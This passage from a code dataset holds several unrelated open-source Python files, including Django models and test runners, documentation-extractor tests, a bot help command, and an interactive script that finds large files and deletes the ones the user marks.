This '\n 'variable will not be initialized from the checkpoint.',\n var_name, ckpt_vars_to_shape_map[var_name], var.shape.as_list())\n else:\n logging.warning('Variable [%s] is not available in checkpoint', var_name)\n\n if isinstance(vars_dict, list):\n return var_in_ckpt.values()\n return var_in_ckpt\n","repo_name":"yongqis/trilinear_se_net","sub_path":"util/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73220853053","text":"from typing import Union\n\nfrom nonebot import on_command\nfrom nonebot.adapters.onebot.v11 import GroupMessageEvent, PrivateMessageEvent\n\ncqwu_help_t = \"重文理帮助\"\ncqwu_help = on_command(\"cqwu\", aliases={cqwu_help_t}, priority=4, block=False)\ncqwu_help.__help_name__ = cqwu_help_t\ncqwu_help.__help_info__ = cqwu_help_t\n\n\n@cqwu_help.handle()\nasync def handle_first_receive(_: Union[GroupMessageEvent, PrivateMessageEvent]):\n await cqwu_help.finish(\n \"重文理帮助\\n\\n\"\n \"/cqwu_login 登录账号\\n\"\n \"/cqwu_score 查询期末成绩\\n\"\n \"/cqwu_balance 查询校园卡余额\\n\"\n \"/cqwu_calendar 查询本学期课表\\n\"\n \"/cqwu_calendar_change 查询本学期调课\\n\"\n \"/cqwu_exam 查询本学期考试安排\"\n )\n","repo_name":"cqwu-ehall/nonebot_plugin_cqwu_support","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4343961929","text":"import sys\nimport unittest\nsys.path.append('../')\nfrom mapped_ranker import *\n\n# pylint: disable-msg=C0103,C0111,R0904 \nclass mapped_rankerTests(unittest.TestCase):\n def setUp(self):\n \"\"\"Copied from mapped_link_matrix and pageranker\n (0)-->(1)-->(2)-->(3)<--(4)\n ↑ ╲__ ↗|\n └─────────────────┘\n With this graph, node 3 should have the highest pagerank, followed by\n nodes 0, 1, 2 in that order. 
4 should be the lowest.\n \"\"\"\n self.m=MappedLinkMatrix(['term0',\n 'term1',\n 'term2',\n 'term3',\n 'term4']) # Create a 5x5 link_matrix\n\n self.r=MappedRanker(PageRanker(epsilon=1e-10))\n self.m[0, 1]=1\n self.m[1, 2]=1\n self.m[2, 3]=2\n self.m[4, 3]=1\n self.m[3, 0]=1\n self.e=[0.15] * len(self.m)\n def testMappedRankerCreatesRankerResultSets(self):\n ranking=self.r.evaluate(self.m, self.e)\n # print ranking\n self.assert_(type(ranking) is RankerResultSet)\n def testResultsMakeSense(self):\n ranking=self.r.evaluate(self.m, self.e)\n self.assert_(ranking['term3'] > ranking['term4'])\n self.assert_(ranking['term2'] < ranking['term0'])\n def testRankerAttributesAccessible(self):\n raised=False\n try:\n self.r.stats\n except:\n raised=True\n self.assertFalse(raised)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"jherskovic/MEDRank","sub_path":"MEDRank/computation/tests/test_mapped_ranker.py","file_name":"test_mapped_ranker.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"25609009180","text":"from PIL import Image\nimport numpy as np\nfrom numpy.linalg import linalg\nimport q6\nimport q7\n\ndef runQ6():\n image = Image.open(\"fox_2.jpg\")\n R, G, B = q6.getImageMatrixes(image)\n ks = [5, 50, 100, 250, 300, 350, 400, 550]\n\n for k in ks:\n nR = q6.decomposeSVD(k, R)\n nG = q6.decomposeSVD(k, G)\n nB = q6.decomposeSVD(k, B)\n newIm = q6.createNewImage(image, nR, nG, nB, k)\n\n\ndef runQ7():\n s_list = [5, 10, 50, 200, 500, 1024]\n k_list = [1, 5, 10, 15, 50, 200]\n train_d, train_l = q7.train_data()\n test_d, test_l = q7.test_data()\n\n predictions = dict()\n U, e, v = np.linalg.svd(train_d, full_matrices=False)\n\n for s in s_list:\n print(s)\n Us = U[:, :s]\n train_proj = np.matmul(Us.T, train_d)\n test_proj = np.matmul(Us.T, test_d)\n inner_products = np.matmul(train_proj.T, test_proj)\n normsTrain = np.square(np.linalg.norm(train_proj, axis=0))\n\n for i in range(test_proj.shape[1]):\n distances = normsTrain - 2 * inner_products[:, i]\n prediction = q7.find_k_neighbors(distances, train_l, k_list)\n for k in prediction:\n predictions[s, k, i] = prediction[k]\n\n errors = q7.find_errors(predictions, k_list, s_list, test_l)\n print(errors)\n\n\nif __name__ == '__main__':\n runQ7()\n\n\n\n\n\n\n","repo_name":"Mormorfor/algebraicMethodsHW04","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"40431807704","text":"# python setup.py test\n# or\n# python runtests.py\n\nimport sys\nfrom django import VERSION as django_version\nfrom django.conf import settings\n\nAPP = 'djrill'\nADMIN = 'django.contrib.admin'\nif django_version >= (1, 7):\n ADMIN = 'django.contrib.admin.apps.SimpleAdminConfig'\n\nsettings.configure(\n DEBUG=True,\n DATABASES={\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n },\n ROOT_URLCONF=APP+'.urls',\n INSTALLED_APPS=(\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n ADMIN,\n APP,\n ),\n MIDDLEWARE_CLASSES=(\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n ),\n TEMPLATES=[\n # Django 1.8 starter-project template settings\n # (needed for test_admin)\n {\n 'BACKEND': 
'django.template.backends.django.DjangoTemplates',\n            'DIRS': [\n                # insert your TEMPLATE_DIRS here\n            ],\n            'APP_DIRS': True,\n            'OPTIONS': {\n                'context_processors': [\n                    'django.contrib.auth.context_processors.auth',\n                    'django.template.context_processors.debug',\n                    'django.template.context_processors.i18n',\n                    'django.template.context_processors.media',\n                    'django.template.context_processors.static',\n                    'django.template.context_processors.tz',\n                    'django.contrib.messages.context_processors.messages',\n                ],\n            },\n        },\n    ],\n)\n\ntry:\n    # Django 1.7+ initialize app registry\n    from django import setup\n    setup()\nexcept ImportError:\n    pass\n\ntry:\n    from django.test.runner import DiscoverRunner as TestRunner  # Django 1.6+\nexcept ImportError:\n    from django.test.simple import DjangoTestSuiteRunner as TestRunner  # Django -1.5\n\n\ndef runtests():\n    test_runner = TestRunner(verbosity=1)\n    failures = test_runner.run_tests([APP])\n    sys.exit(failures)\n\nif __name__ == '__main__':\n    runtests()\n","repo_name":"Kalimita/Djrill","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"}
{"seq_id":"22195980148","text":"import uuid\nfrom django.db import models\nfrom usuario.models import User\nfrom carrito.models import Carro\nfrom .common import OrdenEstado\nfrom .common import choices\nfrom enum import Enum\nfrom direcciones.models import DirrecionesEnvios\n\nfrom django.db.models.signals import pre_save\nclass Orden(models.Model):\n    orden_id = models.CharField(max_length=100, null=False, blank=False, unique=True)\n    usuario = models.ForeignKey(User, on_delete=models.CASCADE)\n    carrito = models.ForeignKey(Carro, on_delete=models.CASCADE)\n    estado = models.CharField(max_length=50, choices=choices, default=OrdenEstado.CREADO)\n    \n    precio_envio = models.DecimalField(default=5, max_digits=8, decimal_places=2)\n    total = models.DecimalField(default=0, max_digits=8, decimal_places=2)\n    fecha_crea = models.DateTimeField(auto_now=True)\n    direccionorden = models.ForeignKey(DirrecionesEnvios,  # a shipping address can have many orders\n                                       null=True, blank=True,\n                                       on_delete=models.CASCADE)\n    def __str__(self):\n        return self.orden_id\n    \n    def cancel(self):\n        self.estado = OrdenEstado.CANCELADA\n        self.save()\n    \n    def complete(self):\n        self.estado = OrdenEstado.COMPLETADA\n        self.save()\n    \n    def update_total(self):\n        self.total = self.get_total()\n        self.save()\n    \n    def get_total(self):\n        return self.carrito.total + self.precio_envio\n    \n    def update_shipping_direccion(self,direccionorden):\n        self.direccionorden = direccionorden\n        self.save()\n    \n    def get_or_set_shipping_address(self):\n        if self.direccionorden:\n            return self.direccionorden\n\n        direccionorden = self.usuario.shipping_address\n\n        if direccionorden:\n            self.direccionorden = direccionorden\n            self.save()\n\n        return direccionorden\n    \n    \ndef set_orden_id(sender, instance, *args, **kwargs):\n    if not instance.orden_id:\n        instance.orden_id = str(uuid.uuid4())\n\ndef set_total(sender, instance, *args, **kwargs):\n    instance.total = instance.get_total()\n\npre_save.connect(set_orden_id, sender=Orden)\npre_save.connect(set_total, sender=Orden)","repo_name":"EdwardAJ6/-Distribuidora-Occidental-Python","sub_path":"orden/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"}
{"seq_id":"12031457451","text":"\"\"\"\nTest resource 
extractor.\n\"\"\"\nfrom pydantic import Field\n\nfrom featurebyte.common.doc_util import FBAutoDoc\nfrom featurebyte.common.documentation.doc_types import (\n ExceptionDetails,\n ParameterDetails,\n ResourceDetails,\n)\nfrom featurebyte.common.documentation.resource_extractor import get_resource_details\nfrom featurebyte.enum import StrEnum\n\n\nclass TestDocumentation:\n \"\"\"\n Class documentation string.\n\n Let's add more lines to this documentation to make this more realistic, and also to make sure\n that it is parsed correctly.\n\n See Also\n --------\n Some text that normally references other resources.\n\n Examples\n --------\n Some example code.\n \"\"\"\n\n pydantic_int_field: int = Field(description=\"pydantic int field description\")\n\n def __init__(self, constructor_param: str):\n self.constructor_param = constructor_param\n\n @property\n def constructor_param_property(self) -> str:\n \"\"\"\n Property documentation string.\n\n Returns\n -------\n str\n Property string\n \"\"\"\n return self.constructor_param\n\n def instance_method(self, arg1: int) -> str:\n \"\"\"\n Method documentation string.\n\n Add more description for extra length, and extra parsing!!\n\n Parameters\n ----------\n arg1: int\n Some description\n\n Returns\n -------\n str\n Some description\n\n Raises\n ------\n Exception\n Some description\n\n Examples\n --------\n Some example code.\n \"\"\"\n if arg1 == 1:\n raise Exception(\"arg is 1\")\n elif self.constructor_param == \"error\":\n raise Exception(\"constructor param is error\")\n return \"test method\"\n\n\nclass TestDocumentationEnum(StrEnum):\n \"\"\"\n Test documentation for enum classes.\n \"\"\"\n\n TEST = \"test\", \"test field 1\"\n TEST2 = \"test2\", \"test field 2\"\n NO_DESCRIPTION = \"no desc\"\n\n\nclass DocClassWithFbAutoDocParams:\n \"\"\"\n Doc class with FBAutoDoc proxy path, and skip params.\n \"\"\"\n\n __fbautodoc__ = FBAutoDoc(\n proxy_class=\"autodoc_proxy\",\n skip_params_and_signature_in_class_docs=True,\n hide_keyword_only_params_in_class_docs=True,\n )\n\n\ndef test_get_resource_details__enum_class():\n \"\"\"\n Test get_resource_details for enum classes.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentationEnum\"\n )\n expected_resource_details = ResourceDetails(\n name=\"TestDocumentationEnum\",\n realname=\"TestDocumentationEnum\",\n path=\"tests.unit.common.documentation.test_resource_extractor\",\n proxy_path=None,\n type=\"class\",\n base_classes=[\"StrEnum\"],\n method_type=None,\n short_description=\"Test documentation for enum classes.\",\n long_description=None,\n parameters=[],\n returns=ParameterDetails(name=None, type=None, default=None, description=None),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[\n ParameterDetails(\n name=\"TEST\",\n type=\"\",\n default=\"None\",\n description=\"test field 1\",\n ),\n ParameterDetails(\n name=\"TEST2\",\n type=\"\",\n default=\"None\",\n description=\"test field 2\",\n ),\n ParameterDetails(\n name=\"NO DESC\",\n type=\"\",\n default=\"None\",\n description=\"Test documentation for enum classes.\",\n ),\n ],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__class():\n \"\"\"\n Test get_resource_details for classes.\n \"\"\"\n resource_details = get_resource_details(\n 
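# anchors use the \"module.path::member\" format; \"#\" appends a proxy path\n        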
\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\"\n )\n expected_resource_details = ResourceDetails(\n name=\"TestDocumentation\",\n realname=\"TestDocumentation\",\n path=\"tests.unit.common.documentation.test_resource_extractor\",\n proxy_path=None,\n type=\"class\",\n base_classes=[\"object\"],\n method_type=None,\n short_description=\"Class documentation string.\",\n long_description=\"Let's add more lines to this documentation to make this more realistic, and also to make \"\n \"sure\\nthat it is parsed correctly.\",\n parameters=[\n ParameterDetails(name=\"constructor_param\", type=\"str\", default=None, description=None)\n ],\n returns=ParameterDetails(name=None, type=None, default=None, description=None),\n raises=[],\n examples=[\"Some example code.\"],\n see_also=\"Some text that normally references other resources.\",\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__method():\n \"\"\"\n Test get_resource_details for method.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::instance_method\"\n )\n expected_resource_details = ResourceDetails(\n name=\"instance_method\",\n realname=\"instance_method\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"method\",\n base_classes=None,\n method_type=None,\n short_description=\"Method documentation string.\",\n long_description=\"Add more description for extra length, and extra parsing!!\",\n parameters=[\n ParameterDetails(name=\"arg1\", type=\"int\", default=None, description=\"Some description\")\n ],\n returns=ParameterDetails(\n name=None, type=\"str\", default=None, description=\"Some description\"\n ),\n raises=[ExceptionDetails(type=\"Exception\", description=\"Some description\")],\n examples=[\"Some example code.\"],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__pydantic_field():\n \"\"\"\n Test get_resource_details for pydantic fields.\n \"\"\"\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::pydantic_int_field\"\n )\n expected_resource_details = ResourceDetails(\n name=\"pydantic_int_field\",\n realname=\"pydantic_int_field\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"property\",\n base_classes=None,\n method_type=None,\n short_description=\"Captures extra information about a field.\", # TODO: this is wrong\n long_description=None,\n parameters=[],\n returns=ParameterDetails(name=None, type=\"FieldInfo\", default=None, description=None),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__property():\n \"\"\"\n Test get_resource_details for properties.\n \"\"\"\n resource_details = get_resource_details(\n 
\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::constructor_param_property\"\n )\n expected_resource_details = ResourceDetails(\n name=\"constructor_param_property\",\n realname=\"constructor_param_property\",\n path=\"tests.unit.common.documentation.test_resource_extractor.TestDocumentation\",\n proxy_path=None,\n type=\"property\",\n base_classes=None,\n method_type=None,\n short_description=\"Property documentation string.\",\n long_description=None,\n parameters=[],\n returns=ParameterDetails(\n name=None, type=\"str\", default=None, description=\"Property string\"\n ),\n raises=[],\n examples=[],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=False,\n should_skip_signature_in_class_docs=False,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n assert resource_details == expected_resource_details\n\n\ndef test_get_resource_details__proxy_paths():\n \"\"\"\n Test proxy paths\n \"\"\"\n # Can specify via # separator\n details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.TestDocumentation::constructor_param_property#proxy\"\n )\n assert details.proxy_path == \"proxy\"\n\n # Or infer via FBAutoDoc override\n resource_details = get_resource_details(\n \"tests.unit.common.documentation.test_resource_extractor.DocClassWithFbAutoDocParams\"\n )\n assert resource_details.proxy_path == \"autodoc_proxy\"\n assert resource_details.should_skip_params_in_class_docs\n assert resource_details.should_skip_signature_in_class_docs\n assert resource_details.should_hide_keyword_only_params_in_class_docs\n\n\ndef test_resource_details__change_view():\n \"\"\"\n Test extracting resource details on get_change_view.\n\n We test this class specifically because the parameters were not getting their types extracted properly. This was\n due to some unknown issue in type_hints. Due to lack of time, a workaround is used to just rely on the annotation\n of the parameter, instead of trying to infer the type. The downside is that this type is just a string, and\n doesn't have any contextual information.\n \"\"\"\n details = get_resource_details(\"featurebyte.api.scd_table.SCDTable::get_change_view\")\n assert details == ResourceDetails(\n name=\"get_change_view\",\n realname=\"get_change_view\",\n path=\"featurebyte.api.scd_table.SCDTable\",\n proxy_path=\"featurebyte.SCDTable\",\n type=\"method\",\n base_classes=None,\n method_type=None,\n short_description=\"Gets a ChangeView from a Slowly Changing Dimension (SCD) table. The view offers a method to \"\n \"examine alterations\",\n long_description=\"that occur in a specific attribute within the natural key of the SCD table.\\n\\nTo create the \"\n \"ChangeView, you need to provide the name of the SCD column for which you want to track \"\n \"changes\\nthrough the track_changes_column parameter.\\n\\nOptionally,\\n\\n- you can define the \"\n \"default Feature Job Setting for the View. 
Default is once a day, at the time of the\n"
        "creation of the view.\n- you can provide a `prefix` parameter to control how the views "
        "columns are named.\n\nThe resulting view has 5 columns:\n\n- the natural key of the "
        "SCDView\n- past_<column_name>: value of the column before the change\n- new_<column_name>"
        ": value of the column after the change\n- past_valid_from_timestamp "
        "(equal to the effective timestamp of the SCD before the change)\n- new_valid_from_timestamp "
        "(equal to the effective timestamp of the SCD after the change)\n\nThe ChangeView can be "
        "used to create Aggregates of Changes Over a Window features, similar to Aggregates Over\na "
        "Window features created from an Event View.",\n        parameters=[\n            ParameterDetails(\n                name="track_changes_column",\n                type="str",\n                default=None,\n                description="Name of the column to track changes for.",\n            ),\n            ParameterDetails(\n                name="default_feature_job_setting",\n                type="Optional[FeatureJobSetting]",\n                default="None",\n                description="Default feature job setting to set with the FeatureJobSetting constructor. If not "\n                "provided, the default\nfeature job setting is daily, aligning with the view's "\n                "creation time.",\n            ),\n            ParameterDetails(\n                name="prefixes",\n                type="Optional[Tuple[Optional[str], Optional[str]]]",\n                default="None",\n                description="Optional prefixes where each element indicates the prefix to add to the new column "\n                "names for the name of\nthe column that we want to track. The first prefix will be "\n                "used for the old, and the second for the new.\nIf not provided, the column names "\n                'will be prefixed with the default values of "past_", and "new_". At\nleast one of '\n                "the values must not be None. If two values are provided, they must be different.",\n            ),\n            ParameterDetails(\n                name="view_mode",\n                type="Literal[ViewMode.AUTO, ViewMode.MANUAL]",\n                default='"auto"',\n                description="View mode to use. When auto, the view will be constructed with cleaning operations.",\n            ),\n            ParameterDetails(\n                name="drop_column_names",\n                type="Optional[List[str]]",\n                default="None",\n                description="List of column names to drop (manual mode only).",\n            ),\n            ParameterDetails(\n                name="column_cleaning_operations",\n                type="Optional[List[ColumnCleaningOperation]]",\n                default="None",\n                description="List of cleaning operations to apply per column in manual mode only. Each element "\n                "in the list indicates the\ncleaning operations for a specific column. The "\n                "association between this column and the cleaning operations\nis established via "\n                "the ColumnCleaningOperation constructor.",\n            ),\n        ],\n        returns=ParameterDetails(\n            name=None,\n            type="ChangeView",\n            default=None,\n            description="ChangeView object constructed from the SCD source table.",\n        ),\n        raises=[],\n        examples=[\n            "Get a ChangeView to track changes in Customer's State.\n",\n            '\n```pycon\n>>> scd_table = catalog.get_table("GROCERYCUSTOMER")\n>>> change_view = '\n            'scd_table.get_change_view(\n...     track_changes_column="State",\n...     prefixes=("previous_", '\n            '"next_"),\n... 
)\\n```\\n',\n ],\n see_also=None,\n enum_values=[],\n should_skip_params_in_class_docs=True,\n should_skip_signature_in_class_docs=True,\n should_hide_keyword_only_params_in_class_docs=False,\n )\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/common/documentation/test_resource_extractor.py","file_name":"test_resource_extractor.py","file_ext":"py","file_size_in_byte":15142,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"19499292942","text":"# Imports\nimport os\nimport pathlib as pl\nimport sys\n\n\n# Variables\nallFiles = {}\nintervalCounter = 0\n\n# Configuration constants\nrawMainPath = \"/\"\nmainPath = pl.Path(rawMainPath)\n\nopenTextMarker = \"\\033[93m\"\ncloseTextMarker = \"\\033[0m\"\n\ninteractive = True\nshowPathErrors = True\nshowRmErrors = True\nshowIntervalPrints = True\nreverseOrder = False\nhumanReadableOutput = True\n\norderBySize = True\nif orderBySize == True:\n orderValue = lambda x: x[1]\nelse:\n orderValue = None\n\nlineRange = 10\ninterval = 0\nminFileSize = 1024 * 1024 * 10\nmaxFilesize = 10 ** 15\n\nsizeNames = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n\ndirsToIgnore = [] # Directories must start with / for example: [\"/AppData\"]\n\ntempDirsToIgnore = []\nfor directory in dirsToIgnore:\n tempDirsToIgnore.append(f\"{mainPath}{pl.Path(directory)}\")\n\ndirsToIgnore = tempDirsToIgnore\n\n\n# Task functions\ndef waitKey():\n key = None\n\n if os.name == 'nt':\n import msvcrt\n key = bytes.decode(msvcrt.getch())\n else:\n import termios\n import tty\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n key = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n \n return key\n\ndef getItemsInPath(path):\n filesInPath = {}\n directoriesInPath = []\n\n try:\n for item in os.scandir(path=path):\n if os.path.isfile(item.path):\n filesInPath[item.path] = item.stat().st_size\n\n elif os.path.isdir(item.path):\n directoriesInPath.append(item.path)\n\n except Exception as ex:\n if showPathErrors == True:\n print(f\"{type(ex).__name__}: {path}\")\n\n return filesInPath, directoriesInPath\n\ndef addFiles(fileDict):\n global intervalCounter\n\n for file, size in fileDict.items():\n if size >= minFileSize and size <= maxFilesize:\n allFiles[file] = size\n\n if showIntervalPrints == True and intervalCounter == interval:\n intervalCounter = 0\n\n if humanReadableOutput == True:\n intervalPrintSize = makeHumanReadable(size)\n else:\n intervalPrintSize = size\n\n print(f\"{file}: {intervalPrintSize}\")\n\n elif showIntervalPrints == True:\n intervalCounter = intervalCounter + 1\n\ndef makeHumanReadable(size):\n count = 0\n newSize = size\n\n while newSize >= 1024:\n newSize = newSize / 1024\n count = count + 1\n newSize = round(newSize, 2)\n\n return f\"{newSize} {sizeNames[count]}\"\n\ndef clear():\n if os.name == \"posix\":\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n# Main functions\ndef crawl(path):\n filesInPath, directoriesInPath = getItemsInPath(path)\n\n addFiles(filesInPath)\n\n for directory in directoriesInPath:\n ignoreDirectory = False\n\n for item in dirsToIgnore:\n if item == directory:\n ignoreDirectory = True\n \n if ignoreDirectory == False:\n crawl(directory)\n\ndef printCurrentRange(minShowedResult, maxShowedResult, rmList, currentSelection):\n clear()\n\n fileLoopCount = 0\n for file, size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n if fileLoopCount >= 
minShowedResult and fileLoopCount <= maxShowedResult:\n rmMark = rmList[file]\n\n if humanReadableOutput == True:\n size = makeHumanReadable(size)\n\n if fileLoopCount == currentSelection:\n print(f\"{openTextMarker}[{rmMark}] {file}: {size}{closeTextMarker}\")\n else:\n print(f\"[{rmMark}] {file}: {size}\")\n\n if fileLoopCount == maxShowedResult:\n break\n\n fileLoopCount = fileLoopCount + 1\n\ndef wPressed(currentSelection, minShowedResult, maxShowedResult):\n if currentSelection - 1 < 0:\n return currentSelection, minShowedResult, maxShowedResult\n\n if currentSelection - 1 < minShowedResult:\n minShowedResult = minShowedResult - 1\n maxShowedResult = maxShowedResult - 1\n\n return currentSelection - 1, minShowedResult, maxShowedResult\n\ndef sPressed(currentSelection, minShowedResult, maxShowedResult):\n if currentSelection + 1 > len(allFiles) - 1:\n return currentSelection, minShowedResult, maxShowedResult\n\n if currentSelection + 1 > maxShowedResult:\n maxShowedResult = maxShowedResult + 1\n minShowedResult = minShowedResult + 1\n\n return currentSelection + 1, minShowedResult, maxShowedResult\n\ndef enterPressed(rmList):\n for file, rmMark in rmList.items():\n if rmMark == \"X\":\n try:\n os.remove(file)\n\n except Exception as ex:\n if showRmErrors == True:\n print(f\"{type(ex).__name__}: {file}\")\n\n exit()\n\ndef spacebarPressed(rmList, currentSelection):\n rmLoopCounter = 0\n \n for file, rmMark in rmList.items():\n if rmLoopCounter == currentSelection:\n if rmMark == \"X\":\n rmList[file] = \" \"\n else:\n rmList[file] = \"X\"\n\n rmLoopCounter = rmLoopCounter + 1\n\n return rmList\n\ndef interactiveResults(orderValue):\n minShowedResult = len(allFiles) - lineRange\n maxShowedResult = len(allFiles) - 1\n currentSelection = maxShowedResult\n\n rmList = {}\n for file, _size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n rmList[file] = \" \"\n \n while True:\n printCurrentRange(minShowedResult, maxShowedResult, rmList, currentSelection)\n print(f\"[{currentSelection} / {len(allFiles) - 1}]\")\n \n returnedKey = waitKey()\n if returnedKey == \"w\":\n currentSelection, minShowedResult, maxShowedResult = wPressed(currentSelection, minShowedResult, maxShowedResult)\n elif returnedKey == \"s\":\n currentSelection, minShowedResult, maxShowedResult = sPressed(currentSelection, minShowedResult, maxShowedResult)\n elif returnedKey == \"\\r\":\n enterPressed(rmList)\n elif returnedKey == \" \":\n rmList = spacebarPressed(rmList, currentSelection)\n elif returnedKey == \"e\":\n exit()\n \ndef printAllResults(orderValue):\n print(\"\\n\", end=\"\")\n \n for file, size in sorted(allFiles.items(), reverse=reverseOrder, key=orderValue):\n if humanReadableOutput == True:\n size = makeHumanReadable(size)\n\n print(f\"{file}: {size}\")\n\n\n# Execution\ncrawl(mainPath)\n\nif len(allFiles) < lineRange:\n lineRange = len(allFiles)\n\nprint(\"Press key to continue... 
\")\nwaitKey()\n\nif interactive == True:\n interactiveResults(orderValue)\nelse:\n printAllResults(orderValue)","repo_name":"matthias020/FileFinder","sub_path":"FileFinder.py","file_name":"FileFinder.py","file_ext":"py","file_size_in_byte":6780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39605388461","text":"# -*- coding: utf-8 -*-\n# noqa: E402\n\"\"\"\n src.__main__\n ~~~~~~~~~~~~\n Handles arguments from the cli and runs the app.\n\n Functions:\n\n main()\n test()\n\n Misc Variables:\n\n cli\n test_present\n\n\"\"\"\nfrom src import app\nfrom flask.cli import FlaskGroup\nimport os\ntry:\n import pytest\n test_present = True\nexcept ImportError: # pragma: no cover\n test_present = False\n\nos.environ[\"FLASK_APP\"] = \"src.__main__:main()\"\n\ncli = FlaskGroup(app)\n\n\ndef main(*args, **kwargs):\n return app\n\n\n@cli.command()\ndef test():\n \"\"\"Run tests\"\"\"\n if test_present:\n pytest.main([\"--doctest-modules\", \"--junitxml=junit/test-results.xml\"])\n else: # pragma: no cover\n app.logger.error(\"Module PyTest is not installed! Install dev dependencies before testing!\") # noqa: E501\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"KnightHacks/hackathon-2021-backend","sub_path":"src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"13978624774","text":"def count_substring(string, sub_string):\n count = 0 \n sublen = len(sub_string)\n for i in range(len(string)):\n if(string[i:i+sublen] == sub_string):\n count += 1\n return count\n\nif __name__ == '__main__':\n print(\"\\nEnter the string: \")\n string = input().strip()\n print(\"\\nEnter the substring: \")\n sub_string = input().strip()\n \n count = count_substring(string, sub_string)\n print(f\"\\nThe substring `{sub_string}` is repeated {count} times in a given string `{string}`\")","repo_name":"rajureddym/python","sub_path":"coding/Basics/Strings/04-substring_count.py","file_name":"04-substring_count.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71050207611","text":"from __future__ import absolute_import\n\nfrom __future__ import division\n\nfrom __future__ import print_function\n\n\n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\nimport glob\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\nprint(os.listdir(\"../input/jigsaw-toxic-comment-classification-challenge\"))\n\nprint(os.listdir(\"../input/nlpword2vecembeddingspretrained\"))\n\nprint(os.listdir(\"../input/fasttext-wikinews\"))\n\nprint(os.listdir(\"../input/fasttext-crawl-300d-2m\"))\n\nprint(os.listdir(\"../input/glove-global-vectors-for-word-representation\"))\n\n\n\n\n\n#print(os.listdir(\"../input/jigsaw-unintended-bias-in-toxicity-classification\"))\n\n\n\n# Any results you write to the current directory are saved as output.\nimport datetime\n\nimport os, codecs\n\nimport pandas as pd\n\nimport numpy as np\n\nimport pkg_resources\n\nimport seaborn as sns\n\nimport time\n\nimport scipy.stats as stats\n\n\n\nfrom sklearn import metrics\n\nfrom sklearn import model_selection\n\n\n\n# Loads word2vec.bin embeddings.\n\nimport gensim\n\nfrom gensim.models import Word2Vec\n\nfrom gensim.utils import simple_preprocess\n\nfrom gensim.models.keyedvectors import KeyedVectors\n\n\n\n# Loads Fastext Embeddings\n\nfrom tqdm import tqdm\n\n\n\nfrom 